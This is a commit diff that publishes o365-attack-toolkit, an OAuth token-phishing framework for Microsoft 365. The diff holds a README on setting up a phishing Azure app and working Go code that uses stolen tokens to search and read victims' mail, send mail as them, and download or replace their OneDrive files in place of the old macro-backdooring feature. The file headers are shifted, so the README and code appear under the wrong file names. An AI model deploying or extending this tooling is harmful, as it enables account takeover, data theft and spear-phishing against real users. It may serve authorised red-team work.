Public release of internal version

Author: 0x09AL

.gitignore

@@ -0,0 +1,7 @@
+.idea/
+.DS_Store
+.devcontainer/
+downloads/*.*
+*.exe
+vendor/
+*pwn*.db

Gopkg.lock

@@ -0,0 +1,42 @@
+# Gopkg.toml example
+#
+# Refer to https://golang.github.io/dep/docs/Gopkg.toml.html
+# for detailed Gopkg.toml documentation.
+#
+# required = ["github.com/user/thing/cmd/thing"]
+# ignored = ["github.com/user/project/pkgX", "bitbucket.org/user/project/pkgA/pkgY"]
+#
+# [[constraint]]
+#   name = "github.com/user/project"
+#   version = "1.0.0"
+#
+# [[constraint]]
+#   name = "github.com/user/project2"
+#   branch = "dev"
+#   source = "github.com/myfork/project2"
+#
+# [[override]]
+#   name = "github.com/x/y"
+#   version = "2.4.0"
+#
+# [prune]
+#   non-go = false
+#   go-tests = true
+#   unused-packages = true
+
+
+[[constraint]]
+  name = "github.com/gorilla/mux"
+  version = "1.7.2"
+
+[[constraint]]
+  name = "github.com/mattn/go-sqlite3"
+  version = "1.10.0"
+
+[[constraint]]
+  name = "gopkg.in/gcfg.v1"
+  version = "1.2.3"
+
+[prune]
+  go-tests = true
+  unused-packages = true

Gopkg.toml

@@ -0,0 +1,115 @@
+## What is o365-attack-toolkit
+
+o365-attack-toolkit allows operators to perform oauth phishing attacks.
+
+We decided to move from the old model of static definitions to fully "interactive" with the account in real-time.
+
+### Some of the changes
+* Interactive E-mail Search - Allows you to search for user e-mails like you would having full access to it.
+* Send e-mails - Allows you to send HTML/TEXT e-mails with attachments from the user mailbox.
+* Interactive File Search and Download - Allows you to search for files using specific keywords and download them offline.
+* File Replacement - Implemented as a replacement for the macro backdooring functionality.
+
+
+
+
+## Architecture
+
+![](images/Architecture.png)
+
+### The toolkit consists of several components
+### Phishing endpoint
+The phishing endpoint is responsible for serving the HTML file that performs the OAuth token phishing.
+### Backend services
+Afterward, the token will be used by the backend services to perform the defined attacks.
+### Management interface
+The management interface can be utilized to inspect the extracted information from the Microsoft Graph API.
+
+## Features
+
+### Interactive E-mail Search
+User e-mails can be accessed by searching for specific keywords using the management interface. The old feature of  downloading keyworded e-mails has been discontinued.
+
+### Send E-mails
+The new version of this tool allows you to send HTML/TXT e-mails, including attachments to a specific e-mail address from the compromised user. This feature is extremly useful as sending a spear-phishing e-mail from the user is more belivable.
+
+### File Search
+Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries.
+User files can be searched and downloaded interactively using the management interface. The old feature of downloading keyworded files has been discontinued. 
+
+### Document Replacing
+Users document hosted on OneDrive/Sharepoint can be modified by using the Graph API. In the initial version of this toolkit, the last 10 files would be backdoored with a pre-defined macro. This was risky during Red Team operations hence the limited usage. For this reason, we implemented a manual file replacement feature to have more control over the attack.
+
+
+## How to set up
+
+### Compile
+
+```
+cd %GOPATH%
+git clone https://github.com/mdsecactivebreach/o365-attack-toolkit
+cd o365-attack-toolkit
+dep ensure
+go build
+```
+
+### Configuration
+
+An example configuration as below :
+```
+[server]
+host = 127.0.0.1
+externalport = 30662
+internalport = 8080
+
+
+[oauth]
+clientid = [REDACTED]
+clientsecret = [REDACTED]
+scope = "offline_access contacts.read user.read mail.read mail.send files.readWrite.all files.read files.read.all openid profile"
+redirecturi = "http://localhost:30662/gettoken"
+```
+
+
+### Deployment
+Before start using this toolkit you need to create an Application on the Azure Portal.
+Go to Azure Active Directory -> App Registrations -> Register an application.
+
+![](images/registerapp.png)
+
+After creating the application, copy the Application ID in the configuration file.
+
+You need to create a client secret which can be done as shown on the following image:
+
+![](images/clientsecret.png)
+
+Update the client secret on the configuration file.
+
+## Management Interface
+
+The management interface allows the operator to browse the data that  has been extracted. 
+
+### Users View
+
+![](images/users.png)
+
+### Search User E-mails
+
+![](images/search-emails.png)
+
+
+### View E-mail
+
+![](images/view-email.png)
+
+### Send E-mail
+
+![](images/send-email.png)
+
+### Search Files
+
+![](images/search-file.png)
+
+### Replace File
+
+![](images/replace-file.png)

README.md

@@ -0,0 +1,76 @@
+package api
+
+import (
+	"encoding/json"
+	"fmt"
+	"log"
+	"net/url"
+	"o365-attack-toolkit/database"
+	"o365-attack-toolkit/model"
+	"strings"
+)
+
+// SendEmail will send an email using the api
+func SendEmail(user model.User, email model.SendEmailStruct) (string, int) {
+
+	data, _ := json.Marshal(email)
+	resp, code := CallAPIMethod("POST", "/me/sendMail", user.AccessToken, "", []byte(data), "application/json")
+
+	return resp, code
+	//log.Printf("E-mail to : %s responded with status code: %d", email.Message.ToRecipients[0].EmailAddress.Address, respcode)
+}
+
+func GetEmailById(user model.User, emailID string) model.SingleMail {
+
+	additionalParameters := url.Values{}
+	additionalParameters.Add("select", "receivedDateTime,hasAttachments,importance,subject,sender,bodyPreview,body")
+	endpoint := fmt.Sprintf("/me/messages/%s?", emailID)
+	messageResponse, _ := CallAPIMethod("GET", endpoint, user.AccessToken, additionalParameters.Encode(), nil, "")
+	mail := model.SingleMail{}
+	json.Unmarshal([]byte(messageResponse), &mail)
+	return mail
+
+}
+
+func GetKeywordEmails(user model.User, searchKeyword string, insertInDB bool) []model.Mail {
+
+	dbMails := []model.Mail{}
+
+	//keyWords := strings.Split(searchKeywords, ",")
+
+	additionalParameters := url.Values{}
+	additionalParameters.Add("select", "receivedDateTime,hasAttachments,importance,subject,sender,bodyPreview,body,toRecipients")
+	additionalParameters.Add("$search", searchKeyword)
+
+	messagesResponse, _ := CallAPIMethod("GET", "/me/messages?", user.AccessToken, additionalParameters.Encode(), nil, "")
+	messages := model.Messages{}
+
+	json.Unmarshal([]byte(messagesResponse), &messages)
+
+	// Loads the first batch of emails.
+	for _, message := range messages.Value {
+		dbMails = append(dbMails, model.Mail{message.ID, user.Mail, message.Subject, message.Sender.EmailAddress.Address, message.Sender.EmailAddress.Name, message.HasAttachments, message.BodyPreview, message.Body.ContentType, message.Body.Content, message.ToRecipients[0].EmailAddress.Address, message.ToRecipients[0].EmailAddress.Name})
+	}
+
+	for messages.OdataNextLink != "" {
+		endpoint := strings.Replace(messages.OdataNextLink, model.ApiEndpointRoot, "", -1)
+		//fmt.Println(endpoint)
+		messagesResponse, _ = CallAPIMethod("GET", endpoint, user.AccessToken, "", nil, "")
+
+		messages = model.Messages{}
+		json.Unmarshal([]byte(messagesResponse), &messages)
+		// Load next batch of emails
+		for _, message := range messages.Value {
+			dbMails = append(dbMails, model.Mail{message.ID, user.Mail, message.Subject, message.Sender.EmailAddress.Address, message.Sender.EmailAddress.Name, message.HasAttachments, message.BodyPreview, message.Body.ContentType, message.Body.Content, message.ToRecipients[0].EmailAddress.Address, message.ToRecipients[0].EmailAddress.Name})
+		}
+	}
+
+	if insertInDB {
+		log.Printf("Inserting %d keyworded emails from %s", len(dbMails), user.Mail)
+		for _, mail := range dbMails {
+			database.InsertEmail(mail)
+		}
+	}
+	return dbMails
+
+}

api/email.go

@@ -0,0 +1,82 @@
+package api
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"log"
+	"net/http"
+	"o365-attack-toolkit/model"
+	"os"
+	"path/filepath"
+)
+
+func renameFile(user model.User, id string, filename string) {
+
+	endpoint := fmt.Sprintf("/me/drive/items/%s", id)
+
+	content := []byte(fmt.Sprintf(`{"name":"%s"}`, filename))
+	CallAPIMethod("PATCH", endpoint, user.AccessToken, "", content, "application/json")
+
+}
+func UpdateFile(user model.User, id string, fileName string, fileContent []byte, fileContentType string) (string, int) {
+
+	endpoint := fmt.Sprintf("/me/drive/items/%s/content", id)
+
+	// Upload the file
+	rsp, code := CallAPIMethod("PUT", endpoint, user.AccessToken, "", fileContent, fileContentType)
+
+	renameFile(user, id, fileName)
+
+	return rsp, code
+
+}
+
+func GetKeywordFiles(user model.User, searchKeyword string, query string) model.Files {
+
+	var tempFiles model.Files
+	endpoint := fmt.Sprintf("/me/drive/root/microsoft.graph.search(q='%s')", searchKeyword)
+
+	filesResponse, _ := CallAPIMethod("GET", endpoint, user.AccessToken, query, nil, "")
+	json.Unmarshal([]byte(filesResponse), &tempFiles)
+	return tempFiles
+}
+
+func LiveDownloadFile(user model.User, fileID string) {
+	// Download the files
+	endpoint := fmt.Sprintf("/me/drive/items/%s/", fileID)
+	driveItemResponse, _ := CallAPIMethod("GET", endpoint, user.AccessToken, "", nil, "")
+	driveItem := model.DriveItem{}
+	json.Unmarshal([]byte(driveItemResponse), &driveItem)
+	log.Printf("Downloading %s", driveItem.Name)
+
+	folderDir := fmt.Sprintf("./downloads/%s", user.UserPrincipalName)
+	if _, err := os.Stat(folderDir); err != nil {
+		if os.IsNotExist(err) {
+			// Create the folder
+			os.Mkdir(folderDir, os.ModePerm)
+		} else {
+			log.Println(err)
+		}
+	}
+	// This function is a little bit unsafe because someone can plant files on your computer with the extension they want.
+
+	//time := time.Now().Unix
+	//downFile := fmt.Sprintf("%s/%s_%d",folderDir,filepath.Base(fileName),time)
+	downFile := fmt.Sprintf("%s/%s", folderDir, filepath.Base(driveItem.Name))
+
+	resp, err := http.Get(driveItem.MicrosoftGraphDownloadURL)
+	if err != nil {
+		log.Println(err)
+	}
+	defer resp.Body.Close()
+
+	out, err := os.Create(downFile)
+	if err != nil {
+		log.Println(err)
+	}
+	defer out.Close()
+
+	_, err = io.Copy(out, resp.Body)
+
+}